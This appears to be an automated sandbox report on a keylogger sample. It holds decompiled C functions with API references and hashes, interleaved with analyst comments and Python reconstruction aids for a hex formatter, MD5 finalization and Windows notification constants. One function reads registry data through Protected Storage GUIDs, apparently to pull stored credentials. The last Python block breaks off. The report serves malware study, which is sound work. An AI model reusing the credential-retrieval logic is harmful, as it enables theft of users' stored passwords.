
C-Code - Quality: 100%
			E0040F41D() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				// Lazily load shell32.dll once; the module handle is cached in the global at 0x418520
				if( *0x418520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x418520 = _t1;
					if(_t1 != 0) {
						// Resolve SHGetSpecialFolderPathA at run time (no import-table entry) and cache the pointer at 0x41851c
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41851c = _t2;
						return _t2;
					}
				}
				// Decompiler output: on the already-loaded path _t1 is returned without being set
				return _t1;
			}


APIs
• LoadLibraryA.KERNEL32(shell32.dll,0040BBB8,76D24DE0,?,00000000), ref: 0040F42B
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040F440
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathA$shell32.dll
• API String ID: 2574300362-543337301
• Opcode ID: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
• Instruction ID: f6b0fe8b92f076911ecc5568a6e4330759afce426f86003319557fe493e3cfe8
• Opcode Fuzzy Hash: ebee045d17af5392e55c599677de8e54218ff7482c30a47864962e580415edd2
• Instruction Fuzzy Hash: 59D092B0642202ABD7208F21AC097827AAAE798706F01C53AA800E12A4FF7895448A5D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
			// Constructor-style initializer for the object in __esi: installs the pointer at 0x415314 (vtable-like),
			// then allocates several small structures and stores them at offsets 0x450..0x460 of the object.
			// L00412090 is called right after a size is pushed, so it is most likely an allocator (assumption from the call pattern).
			E004104AE(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x415314;
				_t27 = E00406578(0x46c, __esi);
				_push(0x20);
				L00412090();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A5B(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L00412090();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A5B(_t28);
				}
				// Three 0x14-byte structures follow, each zeroed except for the 0x100 field at offset 0x10
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L00412090();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				// The two 0x20-byte structures get a size/limit field of 0x2000 at offset 0x14
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				// Four flag fields of the object are set to 1
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}

                                                                                                                                                                  0x0041056b
                                                                                                                                                                  0x00410576
                                                                                                                                                                  0x0041057f
                                                                                                                                                                  0x00410586
                                                                                                                                                                  0x00410589
                                                                                                                                                                  0x0041058c
                                                                                                                                                                  0x0041058f
                                                                                                                                                                  0x00410595

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                  • Opcode ID: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                  • Instruction ID: e5f264b8724d3d475e9e13978f0762699e8b6218914c988ba7d238899ccfa6da
                                                                                                                                                                  • Opcode Fuzzy Hash: 7bad43f24cb77abe56b588b58120f20ee9b42d559bc282368106ea24cb956e28
                                                                                                                                                                  • Instruction Fuzzy Hash: 2431E8B0A007009FD750DF3A99856A6FBE5EF84305B25886FD25ACB262D7B8D481CF19
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E004065B4(char* __edi, intOrPtr _a4, signed int _a8) {
				/* Analyst annotation: renders 0x80 bytes at _a4 as text into the caller-supplied
				   buffer __edi. _a8 is a grouping width; the format string lives at 0x413470
				   (its contents are not part of this dump). */
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);                                  // zero the 256-byte scratch buffer
				_t37 = _t36 + 0xc;
				 *__edi = 0;                                                // start from an empty output string
				_t35 = 0;
				do {
					sprintf( &_v260, 0x413470,  *(_t35 + _a4) & 0x000000ff);   // one input byte -> scratch text
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");                                  // single space between bytes
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");                             // extra gap every _a8 bytes; also fires at index 0
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);                                      // always 128 bytes; __edi is never bounds-checked
				return _t34;
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcat$memsetsprintf
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 582077193-0
                                                                                                                                                                  • Opcode ID: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                  • Instruction ID: 9a6b28ef774d6e53ee32a9c0eecf57d77903bda120735f9d6ade06843e2f5b66
                                                                                                                                                                  • Opcode Fuzzy Hash: f97dc6c3a2e75b9a245aecc583dcd71bc50743b83a8a0946cd7d9d5c2e4ca989
                                                                                                                                                                  • Instruction Fuzzy Hash: 03014C32A042152AD73266569C02BEB3B9C9B58708F10817FF944E51C2EAFCD6D4879D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
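As an added illustration (not code from the report or from the sample), the Python below reimplements the loop of E004065B4 so that its output shape can be recognised in memory dumps or in data the keylogger writes out. The format string at 0x413470 is not visible in this dump, so `%02X` is an assumption; the function names and the `required_buffer_size` helper are mine and are not in the sample.

```python
def format_hex_dump(data, group, fmt="%02X"):
    """Python counterpart of E004065B4.

    Walks exactly 0x80 bytes of `data` (the sample's loop bound), renders each byte
    with `fmt` (assumed; the real format string sits at 0x413470 and is not in the
    dump), separates bytes with one space and inserts an extra two-space gap before
    every `group`-th byte, including byte 0. A non-positive `group` disables grouping,
    matching the `_a8 > 0` test in the decompilation.
    """
    if len(data) < 0x80:
        raise ValueError("E004065B4 reads 128 bytes unconditionally; supply at least that many")
    out = []
    for i in range(0x80):
        piece = fmt % data[i]            # sprintf(&_v260, fmt, byte & 0xff)
        if i > 0:
            out.append(" ")              # strcat(buf, " ")
        if group > 0 and i % group == 0:
            out.append("  ")             # strcat(buf, "  "): fires at i == 0 as well
        out.append(piece)                # strcat(buf, scratch)
    return "".join(out)


def required_buffer_size(group):
    """Bytes a caller must reserve for __edi with a two-character format:
    128 tokens, 127 single spaces, one double space per group start, plus the NUL."""
    gaps = 0 if group <= 0 else -(-0x80 // group)     # ceil(128 / group)
    return 0x80 * 2 + 0x7F + 2 * gaps + 1


if __name__ == "__main__":
    sample = bytes(range(0x80))                        # constructed input
    print(format_hex_dump(sample, 8))
    print("buffer needed:", required_buffer_size(8))
```

The leading double space on the first group and the unconditional 128-byte walk are the two details worth remembering when matching this routine's output against captured data.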

C-Code - Quality: 100%
			E0040BEEC(void* __edi, void* __esi, void* _a4) {
				/* Analyst annotation: finalizes a hash context at __esi and copies the 16-byte
				   digest to _a4. The layout (state at +0, 64-bit bit count at +0x10/+0x14,
				   64-byte block buffer at +0x18, compression routine E0040BF6B) is the one used
				   by the RFC 1321 MD5Final reference code; MD4 shares the same padding scheme. */
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;             // index = (bit count / 8) % 64
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;                                             // mandatory 0x80 pad byte
				_t26 = _t25 - _t13;                                        // bytes left in the block after the pad byte
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);                    // length still fits: zero up to byte 56
				} else {
					memset(_t31, 0, _t26);                                 // no room for the length: fill the block,
					_t33 = __esi + 0x18;
					E0040BF6B(_t33, __esi);                                // compress it,
					memset(_t33, 0, 0x38);                                 // and start a fresh zeroed 56 bytes
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));   // bit length, low dword, at block[56]
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));   // high dword at block[60]
				E0040BF6B(_t35 + 0x18, _t35);                              // final compression
				memcpy(_a4, _t35, 0x10);                                   // digest = the four state words
				return memset(_t35, 0, 4);                                 // context wipe (only 4 bytes, as decompiled)
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                  • Opcode ID: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                  • Instruction ID: 1bd4811e219587db2c743c544c50c2778389369fcaa1acc1f1d0acac3f9f4604
                                                                                                                                                                  • Opcode Fuzzy Hash: f09e4137cee235a1b9d7fd27eaadac0c52e283a178c2e8a252c289c30bf46ad1
                                                                                                                                                                  • Instruction Fuzzy Hash: D90128B1650B002BD235AB35CD03F6B77A4EB54B14F000B1EF642E66D3D7A8A14489AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
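The padding branch in E0040BEEC is the part of a Merkle-Damgård finalization that is easiest to misread, and the quickest way to confirm the MD5 identification is to rebuild the routine around it and compare against a known-good implementation. The Python below is an added example, not code from the report or from the sample: `Md5Ctx` mirrors the context layout read off the decompilation (state, 64-bit bit count, 64-byte buffer), `final()` follows E0040BEEC branch for branch, and `_transform` stands in for E0040BF6B using the RFC 1321 round function, which is an assumption about what E0040BF6B computes. All names are mine; `check_against_hashlib` compares digests with Python's `hashlib` over lengths that exercise both padding branches.

```python
import hashlib
import math
import struct

MASK32 = 0xFFFFFFFF

# Per-step rotation amounts and sine-derived additive constants (RFC 1321).
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK32 for i in range(64)]


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _transform(state, block):
    """Compress one 64-byte block into the four state words (the role E0040BF6B plays)."""
    m = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | (~d & MASK32)), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & MASK32
    for j, v in enumerate((a, b, c, d)):
        state[j] = (state[j] + v) & MASK32


class Md5Ctx:
    """Context laid out like the one E0040BEEC walks: state, bit count, block buffer."""

    def __init__(self):
        self.state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]  # ctx+0x00
        self.count = 0                                                # ctx+0x10, 64-bit bit count
        self.buffer = bytearray(64)                                   # ctx+0x18

    def update(self, data):
        idx = (self.count >> 3) & 0x3F
        self.count = (self.count + 8 * len(data)) & 0xFFFFFFFFFFFFFFFF
        for byte in data:              # byte-wise feed keeps the example short
            self.buffer[idx] = byte
            idx += 1
            if idx == 64:              # block full: compress it
                _transform(self.state, bytes(self.buffer))
                idx = 0

    def final(self):
        """Branch-for-branch counterpart of E0040BEEC."""
        idx = (self.count >> 3) & 0x3F                  # (count >> 3) & 0x3f
        self.buffer[idx] = 0x80                         # *_t30 = 0x80
        remaining = 0x3F - idx                          # _t26 = 0x3f - idx
        if remaining >= 8:
            # Length field still fits: zero from idx+1 up to byte 56 (memset of _t26 - 8).
            self.buffer[idx + 1:56] = bytes(remaining - 8)
        else:
            # No room for the 8-byte length: fill, compress, then zero a fresh 56 bytes.
            self.buffer[idx + 1:64] = bytes(remaining)
            _transform(self.state, bytes(self.buffer))
            self.buffer[0:56] = bytes(56)
        self.buffer[56:64] = struct.pack("<Q", self.count)  # ctx+0x50 / ctx+0x54
        _transform(self.state, bytes(self.buffer))
        digest = struct.pack("<4I", *self.state)            # memcpy(_a4, ctx, 0x10)
        self.state = [0, 0, 0, 0]                           # wipe, as the reference code intends
        return digest


def md5_hex(data):
    ctx = Md5Ctx()
    ctx.update(data)
    return ctx.final().hex()


def check_against_hashlib(lengths=(0, 1, 3, 55, 56, 57, 63, 64, 65, 119, 120, 121, 200)):
    """True if our finalization agrees with hashlib on lengths hitting both padding branches."""
    for n in lengths:
        msg = bytes((i * 7 + 3) & 0xFF for i in range(n))   # constructed test input
        if md5_hex(msg) != hashlib.md5(msg).hexdigest():
            return False
    return True


if __name__ == "__main__":
    print(md5_hex(b"abc"))
    print("matches hashlib:", check_against_hashlib())
```

Lengths 56 through 63 take the second branch (the 0x80 byte leaves fewer than 8 bytes in the block), so an implementation that only ever tests short inputs will not exercise the extra compression; the lengths in `check_against_hashlib` cover both sides of that boundary.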

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040242B(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                                                                                                  				void _v2058;
                                                                                                                                                                  				char _v2060;
                                                                                                                                                                  				char _v2069;
                                                                                                                                                                  				char _v2070;
                                                                                                                                                                  				char _v2071;
                                                                                                                                                                  				char _v2072;
                                                                                                                                                                  				char _v3086;
                                                                                                                                                                  				signed char _v3090;
                                                                                                                                                                  				char _v3091;
                                                                                                                                                                  				char _v3092;
                                                                                                                                                                  				char* _v3096;
                                                                                                                                                                  				char _v3100;
                                                                                                                                                                  				short* _v3104;
                                                                                                                                                                  				int _v3108;
                                                                                                                                                                  				char _v3112;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  				signed int _t61;
                                                                                                                                                                  				short* _t76;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				signed int _t87;
                                                                                                                                                                  				void* _t90;
                                                                                                                                                                  
                                                                                                                                                                  				_t83 = __eax;
                                                                                                                                                                  				_t73 = 0;
                                                                                                                                                                  				 *_a12 = 0;
                                                                                                                                                                  				_v3112 = 0x400;
                                                                                                                                                                  				_t49 = E0040F214(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                                                                                                                  				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                                                                                                                  				if(_t49 == 0) {
                                                                                                                                                                  					_v2069 = 0;
                                                                                                                                                                  					_v2070 = 0;
                                                                                                                                                                  					_v2071 = 0;
                                                                                                                                                                  					_v2072 = 0;
                                                                                                                                                                  					if(_v3092 != 1) {
                                                                                                                                                                  						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                                                                                                                  							_v3100 = _v3112 - 1;
                                                                                                                                                                  							_v3096 =  &_v3091;
                                                                                                                                                                  							if(E0040481B(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                                                                                                                  								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                                                                                                                  								LocalFree(_v3104);
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                                                                                                                  							if(_a16 == 0) {
                                                                                                                                                                  								E0040EFF9(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_v2060 = 0;
                                                                                                                                                                  								memset( &_v2058, 0, 0x800);
                                                                                                                                                                  								_t90 = _t90 + 0xc;
                                                                                                                                                                  								_t76 =  &_v2060;
                                                                                                                                                                  								E0040EFF9(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                                                                                                                  								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                                                                                                                  							}
                                                                                                                                                                  							_t73 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t79 = _a12;
                                                                                                                                                                  						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                                                                                                                  							_t61 = _v3090 & 0x000000ff;
                                                                                                                                                                  							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                                                                                                                  								E00401DBC(_t79,  &_v3086, _t61);
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return 0 |  *_a12 != _t73;
                                                                                                                                                                  			}

APIs
  • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004024EB
• memset.MSVCRT ref: 004024B4
  • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
  • Part of subcall function 0040EFF9: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
  • Part of subcall function 0040EFF9: memcpy.MSVCRT ref: 0040F075
  • Part of subcall function 0040EFF9: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025A3
• LocalFree.KERNEL32(?), ref: 004025AD
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
• Opcode ID: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
• Instruction ID: cfc3eb1076764f39a441947bf0103a86c194fcc0ae6958193510771120a15821
• Opcode Fuzzy Hash: 311549387020673e673ad7ade458deddd79687b60b573298398fe302b42a0f0d
• Instruction Fuzzy Hash: 0341A3B1408385BFDB11DE608D44AAB7BDCAB88304F044A7EF588A21C1D679DA44CB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 98%
                                                                                                                                                                  			E0040B4DE(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				void _v263;
                                                                                                                                                                  				char _v264;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t42;
                                                                                                                                                                  				signed int _t45;
                                                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                                                  				signed char _t62;
                                                                                                                                                                  				intOrPtr _t63;
                                                                                                                                                                  				int _t65;
                                                                                                                                                                  
                                                                                                                                                                  				_t61 = __ecx;
                                                                                                                                                                  				_t60 = _a8;
                                                                                                                                                                  				_t63 = __ecx;
                                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                                  				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                                                                                                                                  					_t42 = E00408D0D( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                                                                                                                                  					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
					 *(_t63 + 0x110) = _t42;
				}
				/* _a4 is the WM_NOTIFY wParam (control id); *(_t60 + 8) is NMHDR.code. 0xfffffffe == -2 == NM_CLICK */
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
					/* zero a 256-byte stack buffer (_v264 plus the 255 bytes after it) before the string load */
					_v264 = 0;
					memset( &_v263, 0, 0xff);
					E004019DA(_t61,  &_v264, 0x413438);
					_t42 = E00406552( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
					_t63 = _v8;
				}
				_t65 = 0;
				/* 0xfffffdf8 == -520 == TTN_GETDISPINFOA: the tooltip control asks for the text of a toolbar button */
				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
					/* 0x423 == WM_USER + 35 == TB_GETTOOLTIPS: HWND of the toolbar's tooltip control */
					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
					/* NMHDR.hwndFrom == that tooltip window */
					if( *_t60 == _t42) {
						/* copy the menu text for NMHDR.idFrom (MF_BYCOMMAND) into NMTTDISPINFOA.szText at +0x10;
						   szText is 80 bytes, hence cchMax 0x4f; +0x60 is NMTTDISPINFOA.hinst, cleared to NULL */
						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
						 *((intOrPtr*)(_t60 + 0x60)) = 0;
					}
				}
				if(_a4 != 0x103) {
					L27:
					return _t42;
				} else {
					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
					/* 0xfffffffd == -3 == NM_DBLCLK */
					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
						_t42 = E0040AFC4(_t61, _t63, _t63, _t80);
						_t65 = 0;
					}
					/* 0xffffff94 == -108 == LVN_COLUMNCLICK; *(_t60 + 0x10) is NMLISTVIEW.iSubItem, the clicked column */
					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
						_t42 = E00408C35( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
						_t65 = 0;
					}
					/* 0xffffff9b == -101 == LVN_ITEMCHANGED */
					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
						goto L27;
					} else {
						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
							/* _t62 == 2 == LVIS_SELECTED; *(_t60 + 0x14) is NMLISTVIEW.uNewState, *(_t60 + 0x18) is uOldState.
							   The ladder below sets _t42 = 1 exactly when the LVIS_SELECTED bit differs between old and new state */
							_t62 = 2;
							_t45 =  *(_t60 + 0x14) & _t62;
							__eflags = _t45;
							if(_t45 == 0) {
								L20:
								__eflags = _t45 - _t62;
								if(_t45 == _t62) {
									L23:
									_t42 = 0;
									__eflags = 0;
									L24:
									if(_t42 == _t65) {
										goto L27;
									}
									/* *(_t63 + 0x25c) is a one-shot flag: post WM_USER + 2 (0x402) only if no earlier post is still outstanding */
									_t42 = _t63 + 0x25c;
									if( *_t42 != _t65) {
										goto L27;
									}
									 *_t42 = 1;
									return PostMessageA( *(_t63 + 0x108), 0x402, _t65, _t65);
								}
								__eflags =  *(_t60 + 0x18) & _t62;
								if(( *(_t60 + 0x18) & _t62) == 0) {
									goto L23;
								}
								L22:
								_t42 = 1;
								goto L24;
							}
							__eflags =  *(_t60 + 0x18) & _t62;
							if(( *(_t60 + 0x18) & _t62) == 0) {
								goto L22;
							}
							goto L20;
						}
						/* neg/sbb/neg idiom, rendered by the decompiler as a double ~: _t42 = ((uOldState ^ uNewState) & 0xF002) != 0,
						   i.e. LVIS_SELECTED (0x2) or the LVIS_STATEIMAGEMASK (0xF000, checkbox image) bits changed */
						asm("sbb eax, eax");
						_t42 =  ~( ~(( *(_t60 + 0x18) ^  *(_t60 + 0x14)) & 0x0000f002));
						goto L24;
					}
				}
			}

Instruction addresses of the statements above (per-line column): 0x0040b4de to 0x0040b653

APIs
• memset.MSVCRT ref: 0040B548
• SendMessageA.USER32 ref: 0040B58C
• GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040B5A6
• PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040B649
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Message$MenuPostSendStringmemset
• String ID:
• API String ID: 3798638045-0
• Opcode ID: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
• Instruction ID: f81f675eeec9d049c2f837a36ed854dba7505ce636643832e7163bdc5c509590
• Opcode Fuzzy Hash: d3a55612aad303442b70cf6981c395df1170026015e9bbabf54ddfea19c8819b
• Instruction Fuzzy Hash: F141E130600611EFCB259F24CC85AA6BBA4FF04325F1486B6E958AB2C5C378DD91CBDD
Uniqueness

Uniqueness Score: -1.00%
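The function above is a WM_NOTIFY handler whose constants only make sense once the sign-extended notification codes and structure offsets are resolved against the Win32 headers. The following Python is an added reconstruction aid, not code from the sample and not Joe Sandbox output: it resolves the raw 32-bit immediates compared in the listing to their commctrl.h names, parses a constructed NMLISTVIEW the way the handler indexes it (uNewState at +0x14, uOldState at +0x18), and re-implements both LVN_ITEMCHANGED decision forms (the L20/L22/L23 branch ladder and the neg/sbb/neg mask) to show what they compute. It assumes that _t60 points to the NMHDR of the notification (inferred from the offsets and constants, not stated on the page); the names track_state_image for the field at +0x1b8 and refresh_pending for the flag at _t63+0x25c, and the notification bytes, are constructed for the example.

```python
"""Reconstruction aid for the WM_NOTIFY handler in the listing (constructed example, not sample code)."""
import struct

# Win32 constants from winuser.h / commctrl.h (facts, not assumptions)
WM_USER = 0x0400
TB_GETTOOLTIPS = WM_USER + 35          # 0x423, the message sent via SendMessageA in the listing
NM_FIRST = 0
TTN_FIRST = -520
LVN_FIRST = -100
LVIS_SELECTED = 0x0002
LVIS_STATEIMAGEMASK = 0xF000

NOTIFY_CODES = {
    NM_FIRST - 2: "NM_CLICK",
    NM_FIRST - 3: "NM_DBLCLK",
    TTN_FIRST - 0: "TTN_GETDISPINFOA",
    LVN_FIRST - 1: "LVN_ITEMCHANGED",
    LVN_FIRST - 8: "LVN_COLUMNCLICK",
}

# 32-bit immediates exactly as the decompiler prints them in the listing
RAW_CODES_IN_LISTING = (0xfffffffe, 0xfffffdf8, 0xfffffffd, 0xffffff94, 0xffffff9b)


def to_int32(raw: int) -> int:
    """Sign-extend a 32-bit value (NMHDR.code is compared as an unsigned immediate)."""
    raw &= 0xFFFFFFFF
    return raw - 0x1_0000_0000 if raw & 0x8000_0000 else raw


def resolve_notify_code(raw: int) -> str:
    code = to_int32(raw)
    return NOTIFY_CODES.get(code, "unknown(%d)" % code)


def annotate_listing() -> dict:
    """Map every raw code compared in the listing to its symbolic name."""
    return {hex(r): resolve_notify_code(r) for r in RAW_CODES_IN_LISTING}


# NMLISTVIEW on 32-bit Windows: NMHDR{hwndFrom, idFrom, code} then iItem, iSubItem,
# uNewState, uOldState, uChanged, POINT ptAction, lParam. uNewState/uOldState land at
# +0x14/+0x18, the offsets the listing reads as *(_t60 + 0x14) / *(_t60 + 0x18).
NMLISTVIEW_FMT = "<IIiiiIIIiii"
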